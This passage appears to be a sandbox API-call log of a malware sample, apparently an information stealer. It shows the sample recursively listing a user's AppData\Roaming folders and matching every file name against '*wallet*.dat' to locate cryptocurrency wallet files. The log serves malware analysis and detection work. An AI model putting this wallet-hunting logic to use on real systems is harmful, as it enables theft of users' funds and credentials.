ftLastWriteTime.dwLowDateTime=0x1d8a131, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x38a3, nFileSizeLow=0x0, dwReserved0=0x197b00, dwReserved1=0x6c0045, cFileName="K", cAlternateFileName="FLASHP~1Ð\x07\x02")) returned 0xffffffff [0175.062] FindNextFileA (in: hFindFile=0x4eb390, lpFindFileData=0x19848c | out: lpFindFileData=0x19848c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5763720, ftCreationTime.dwHighDateTime=0x1d89d69, ftLastAccessTime.dwLowDateTime=0x9b45dd30, ftLastAccessTime.dwHighDateTime=0x1d8a6b8, ftLastWriteTime.dwLowDateTime=0x9b45dd30, ftLastWriteTime.dwHighDateTime=0x1d8a6b8, nFileSizeHigh=0x0, nFileSizeLow=0xfd75, dwReserved0=0x0, dwReserved1=0x197b00, cFileName="fBJr8Vr.wav", cAlternateFileName="")) returned 1 [0175.062] StrCmpCA (pszStr1="fBJr8Vr.wav", pszStr2=".") returned 56 [0175.062] StrCmpCA (pszStr1="fBJr8Vr.wav", pszStr2="..") returned 56 [0175.062] wsprintfA (in: param_1=0x19827c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\fBJr8Vr.wav") returned 49 [0175.062] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0175.062] wsprintfA (in: param_1=0x198384, param_2="%s" | out: param_1="fBJr8Vr.wav") returned 11 [0175.062] PathMatchSpecA (pszFile="fBJr8Vr.wav", pszSpec="*wallet*.dat") returned 0 [0175.062] wsprintfA (in: param_1=0x197f4c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\fBJr8Vr.wav\\*") returned 51 [0175.062] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\fBJr8Vr.wav\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\fbjr8vr.wav\\*"), lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0xb5763720, ftCreationTime.dwLowDateTime=0x1d89d69, ftCreationTime.dwHighDateTime=0x9b45dd30, ftLastAccessTime.dwLowDateTime=0x1d8a6b8, ftLastAccessTime.dwHighDateTime=0x9b45dd30, ftLastWriteTime.dwLowDateTime=0x1d8a6b8, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xfd75, nFileSizeLow=0x0, dwReserved0=0x197b00, dwReserved1=0x420066, cFileName="J", cAlternateFileName="FLASHP~1Ð\x07\x02")) returned 0xffffffff [0175.062] FindNextFileA (in: hFindFile=0x4eb390, lpFindFileData=0x19848c | out: lpFindFileData=0x19848c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc714f6e0, ftCreationTime.dwHighDateTime=0x1d8a63f, ftLastAccessTime.dwLowDateTime=0x9779e070, ftLastAccessTime.dwHighDateTime=0x1d8a70d, ftLastWriteTime.dwLowDateTime=0x9779e070, ftLastWriteTime.dwHighDateTime=0x1d8a70d, nFileSizeHigh=0x0, nFileSizeLow=0x3df2, dwReserved0=0x0, dwReserved1=0x197b00, cFileName="FKlEZHbOvksZrHpSUu1.wav", cAlternateFileName="FKLEZH~1.WAV")) returned 1 [0175.062] StrCmpCA (pszStr1="FKlEZHbOvksZrHpSUu1.wav", pszStr2=".") returned 24 [0175.062] StrCmpCA (pszStr1="FKlEZHbOvksZrHpSUu1.wav", pszStr2="..") returned 24 [0175.063] wsprintfA (in: param_1=0x19827c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FKlEZHbOvksZrHpSUu1.wav") returned 61 [0175.063] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0175.063] wsprintfA (in: param_1=0x198384, param_2="%s" | out: param_1="FKlEZHbOvksZrHpSUu1.wav") returned 23 [0175.063] PathMatchSpecA (pszFile="FKlEZHbOvksZrHpSUu1.wav", pszSpec="*wallet*.dat") returned 0 [0175.063] wsprintfA (in: param_1=0x197f4c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FKlEZHbOvksZrHpSUu1.wav\\*") returned 63 [0175.063] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FKlEZHbOvksZrHpSUu1.wav\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\fklezhbovkszrhpsuu1.wav\\*"), lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0xc714f6e0, ftCreationTime.dwLowDateTime=0x1d8a63f, ftCreationTime.dwHighDateTime=0x9779e070, ftLastAccessTime.dwLowDateTime=0x1d8a70d, ftLastAccessTime.dwHighDateTime=0x9779e070, ftLastWriteTime.dwLowDateTime=0x1d8a70d, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x3df2, nFileSizeLow=0x0, dwReserved0=0x197b00, dwReserved1=0x4b0046, cFileName="l", cAlternateFileName="FLASHP~1Ð\x07\x02")) returned 0xffffffff [0175.063] FindNextFileA (in: hFindFile=0x4eb390, lpFindFileData=0x19848c | out: lpFindFileData=0x19848c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9f99920, ftCreationTime.dwHighDateTime=0x1d89e50, ftLastAccessTime.dwLowDateTime=0xe2fa5110, ftLastAccessTime.dwHighDateTime=0x1d8a154, ftLastWriteTime.dwLowDateTime=0xe2fa5110, ftLastWriteTime.dwHighDateTime=0x1d8a154, nFileSizeHigh=0x0, nFileSizeLow=0x17ce3, dwReserved0=0x0, dwReserved1=0x197b00, cFileName="GyJT6Qc2t8RgEotlr.doc", cAlternateFileName="GYJT6Q~1.DOC")) returned 1 [0175.063] StrCmpCA (pszStr1="GyJT6Qc2t8RgEotlr.doc", pszStr2=".") returned 25 [0175.063] StrCmpCA (pszStr1="GyJT6Qc2t8RgEotlr.doc", pszStr2="..") returned 25 [0175.063] wsprintfA (in: param_1=0x19827c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GyJT6Qc2t8RgEotlr.doc") returned 59 [0175.063] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0175.063] wsprintfA (in: param_1=0x198384, param_2="%s" | out: param_1="GyJT6Qc2t8RgEotlr.doc") returned 21 [0175.063] PathMatchSpecA (pszFile="GyJT6Qc2t8RgEotlr.doc", pszSpec="*wallet*.dat") returned 0 [0175.063] wsprintfA (in: param_1=0x197f4c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GyJT6Qc2t8RgEotlr.doc\\*") returned 61 [0175.063] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GyJT6Qc2t8RgEotlr.doc\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\gyjt6qc2t8rgeotlr.doc\\*"), lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0xc9f99920, ftCreationTime.dwLowDateTime=0x1d89e50, ftCreationTime.dwHighDateTime=0xe2fa5110, ftLastAccessTime.dwLowDateTime=0x1d8a154, ftLastAccessTime.dwHighDateTime=0xe2fa5110, ftLastWriteTime.dwLowDateTime=0x1d8a154, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x17ce3, nFileSizeLow=0x0, dwReserved0=0x197b00, dwReserved1=0x790047, cFileName="J", cAlternateFileName="FLASHP~1Ð\x07\x02")) returned 0xffffffff [0175.063] FindNextFileA (in: hFindFile=0x4eb390, lpFindFileData=0x19848c | out: lpFindFileData=0x19848c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fea1dd0, ftCreationTime.dwHighDateTime=0x1d89980, ftLastAccessTime.dwLowDateTime=0xcfe01890, ftLastAccessTime.dwHighDateTime=0x1d89e97, ftLastWriteTime.dwLowDateTime=0xcfe01890, ftLastWriteTime.dwHighDateTime=0x1d89e97, nFileSizeHigh=0x0, nFileSizeLow=0x7702, dwReserved0=0x0, dwReserved1=0x197b00, cFileName="lk6diuvgpEF.gif", cAlternateFileName="LK6DIU~1.GIF")) returned 1 [0175.063] StrCmpCA (pszStr1="lk6diuvgpEF.gif", pszStr2=".") returned 62 [0175.063] StrCmpCA (pszStr1="lk6diuvgpEF.gif", pszStr2="..") returned 62 [0175.063] wsprintfA (in: param_1=0x19827c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\lk6diuvgpEF.gif") returned 53 [0175.063] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0175.063] wsprintfA (in: param_1=0x198384, param_2="%s" | out: param_1="lk6diuvgpEF.gif") returned 15 [0175.063] PathMatchSpecA (pszFile="lk6diuvgpEF.gif", pszSpec="*wallet*.dat") returned 0 [0175.063] wsprintfA (in: param_1=0x197f4c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\lk6diuvgpEF.gif\\*") returned 55 [0175.063] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\lk6diuvgpEF.gif\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\lk6diuvgpef.gif\\*"), lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x1fea1dd0, ftCreationTime.dwLowDateTime=0x1d89980, ftCreationTime.dwHighDateTime=0xcfe01890, ftLastAccessTime.dwLowDateTime=0x1d89e97, ftLastAccessTime.dwHighDateTime=0xcfe01890, ftLastWriteTime.dwLowDateTime=0x1d89e97, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x7702, nFileSizeLow=0x0, dwReserved0=0x197b00, dwReserved1=0x6b006c, cFileName="6", cAlternateFileName="FLASHP~1Ð\x07\x02")) returned 0xffffffff [0175.063] FindNextFileA (in: hFindFile=0x4eb390, lpFindFileData=0x19848c | out: lpFindFileData=0x19848c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70cc6fc0, ftCreationTime.dwHighDateTime=0x1d8994c, ftLastAccessTime.dwLowDateTime=0xc1479030, ftLastAccessTime.dwHighDateTime=0x1d8a665, ftLastWriteTime.dwLowDateTime=0xc1479030, ftLastWriteTime.dwHighDateTime=0x1d8a665, nFileSizeHigh=0x0, nFileSizeLow=0x1e90, dwReserved0=0x0, dwReserved1=0x197b00, cFileName="LqYDjH.avi", cAlternateFileName="")) returned 1 [0175.064] StrCmpCA (pszStr1="LqYDjH.avi", pszStr2=".") returned 30 [0175.064] StrCmpCA (pszStr1="LqYDjH.avi", pszStr2="..") returned 30 [0175.064] wsprintfA (in: param_1=0x19827c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\LqYDjH.avi") returned 48 [0175.064] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0175.064] wsprintfA (in: param_1=0x198384, param_2="%s" | out: param_1="LqYDjH.avi") returned 10 [0175.064] PathMatchSpecA (pszFile="LqYDjH.avi", pszSpec="*wallet*.dat") returned 0 [0175.064] wsprintfA (in: param_1=0x197f4c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\LqYDjH.avi\\*") returned 50 [0175.064] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\LqYDjH.avi\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\lqydjh.avi\\*"), lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x70cc6fc0, ftCreationTime.dwLowDateTime=0x1d8994c, ftCreationTime.dwHighDateTime=0xc1479030, ftLastAccessTime.dwLowDateTime=0x1d8a665, ftLastAccessTime.dwHighDateTime=0xc1479030, ftLastWriteTime.dwLowDateTime=0x1d8a665, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1e90, nFileSizeLow=0x0, dwReserved0=0x197b00, dwReserved1=0x71004c, cFileName="Y", cAlternateFileName="FLASHP~1Ð\x07\x02")) returned 0xffffffff [0175.064] FindNextFileA (in: hFindFile=0x4eb390, lpFindFileData=0x19848c | out: lpFindFileData=0x19848c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xa92f1c4e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f1c4e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x197b00, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0175.064] StrCmpCA (pszStr1="Microsoft", pszStr2=".") returned 31 [0175.064] StrCmpCA (pszStr1="Microsoft", pszStr2="..") returned 31 [0175.064] wsprintfA (in: param_1=0x19827c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft") returned 47 [0175.064] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0175.064] wsprintfA (in: param_1=0x198384, param_2="%s" | out: param_1="Microsoft") returned 9 [0175.064] PathMatchSpecA (pszFile="Microsoft", pszSpec="*wallet*.dat") returned 0 [0175.064] wsprintfA (in: param_1=0x197f4c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\*") returned 49 [0175.064] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\*"), lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x197478, cFileName=".", cAlternateFileName="")) returned 0x4eae10 [0175.064] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.064] FindNextFileA (in: hFindFile=0x4eae10, lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x197478, cFileName="..", cAlternateFileName="")) returned 1 [0175.064] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.064] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.064] FindNextFileA (in: hFindFile=0x4eae10, lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x197478, cFileName="AddIns", cAlternateFileName="")) returned 1 [0175.065] StrCmpCA (pszStr1="AddIns", pszStr2=".") returned 19 [0175.065] StrCmpCA (pszStr1="AddIns", pszStr2="..") returned 19 [0175.065] wsprintfA (in: param_1=0x197bf4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns") returned 54 [0175.065] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0175.065] wsprintfA (in: param_1=0x197cfc, param_2="%s\\%s" | out: param_1="Microsoft\\AddIns") returned 16 [0175.065] PathMatchSpecA (pszFile="AddIns", pszSpec="*wallet*.dat") returned 0 [0175.065] wsprintfA (in: param_1=0x1978c4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\*") returned 56 [0175.065] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\addins\\*"), lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7, dwReserved1=0x4c0260, cFileName=".", cAlternateFileName="")) returned 0x4eb090 [0175.066] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.066] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7, dwReserved1=0x4c0260, cFileName="..", cAlternateFileName="")) returned 1 [0175.066] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.066] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.066] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7, dwReserved1=0x4c0260, cFileName="..", cAlternateFileName="")) returned 0 [0175.066] FindClose (in: hFindFile=0x4eb090 | out: hFindFile=0x4eb090) returned 1 [0175.066] FindNextFileA (in: hFindFile=0x4eae10, lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x7, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0175.066] StrCmpCA (pszStr1="Bibliography", pszStr2=".") returned 20 [0175.066] StrCmpCA (pszStr1="Bibliography", pszStr2="..") returned 20 [0175.066] wsprintfA (in: param_1=0x197bf4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography") returned 60 [0175.066] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0175.066] wsprintfA (in: param_1=0x197cfc, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography") returned 22 [0175.066] PathMatchSpecA (pszFile="Bibliography", pszSpec="*wallet*.dat") returned 0 [0175.066] wsprintfA (in: param_1=0x1978c4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\*") returned 62 [0175.066] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\*"), lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7, dwReserved1=0x4c0260, cFileName=".", cAlternateFileName="")) returned 0x4eb090 [0175.339] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.339] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7, dwReserved1=0x4c0260, cFileName="..", cAlternateFileName="")) returned 1 [0175.339] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.339] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.339] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80ed2ca5, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7, dwReserved1=0x4c0260, cFileName="Style", cAlternateFileName="")) returned 1 [0175.339] StrCmpCA (pszStr1="Style", pszStr2=".") returned 37 [0175.339] StrCmpCA (pszStr1="Style", pszStr2="..") returned 37 [0175.339] wsprintfA (in: param_1=0x19756c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned 66 [0175.339] StrCmpCA (pszStr1="Microsoft\\Bibliography", pszStr2="") returned 77 [0175.339] wsprintfA (in: param_1=0x197674, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style") returned 28 [0175.339] PathMatchSpecA (pszFile="Style", pszSpec="*wallet*.dat") returned 0 [0175.339] wsprintfA (in: param_1=0x19723c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*") returned 68 [0175.339] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\*"), lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80ed2ca5, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x4c0260, cFileName=".", cAlternateFileName="")) returned 0x4eb1d0 [0175.342] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.342] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80ed2ca5, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x4c0260, cFileName="..", cAlternateFileName="")) returned 1 [0175.342] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.342] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.342] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80e9e60e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9e60e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a58ff51, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x51722, dwReserved0=0x4, dwReserved1=0x4c0260, cFileName="APASixthEditionOfficeOnline.xsl", cAlternateFileName="APASIX~1.XSL")) returned 1 [0175.342] StrCmpCA (pszStr1="APASixthEditionOfficeOnline.xsl", pszStr2=".") returned 19 [0175.342] StrCmpCA (pszStr1="APASixthEditionOfficeOnline.xsl", pszStr2="..") returned 19 [0175.342] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl") returned 98 [0175.342] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0175.342] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl") returned 60 [0175.342] PathMatchSpecA (pszFile="APASixthEditionOfficeOnline.xsl", pszSpec="*wallet*.dat") returned 0 [0175.342] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl\\*") returned 100 [0175.342] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x80e9e60e, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80e9e60e, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5a58ff51, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x51722, nFileSizeLow=0x4, dwReserved0=0x4c0260, dwReserved1=0x500041, cFileName="A", cAlternateFileName="C")) returned 0xffffffff [0175.342] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ea6d97, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ea6d97, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x48839, dwReserved0=0x4, dwReserved1=0x4c0260, cFileName="CHICAGO.XSL", cAlternateFileName="")) returned 1 [0175.342] StrCmpCA (pszStr1="CHICAGO.XSL", pszStr2=".") returned 21 [0175.342] StrCmpCA (pszStr1="CHICAGO.XSL", pszStr2="..") returned 21 [0175.342] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL") returned 78 [0175.342] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0175.342] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\CHICAGO.XSL") returned 40 [0175.342] PathMatchSpecA (pszFile="CHICAGO.XSL", pszSpec="*wallet*.dat") returned 0 [0175.343] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL\\*") returned 80 [0175.343] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl\\*"), 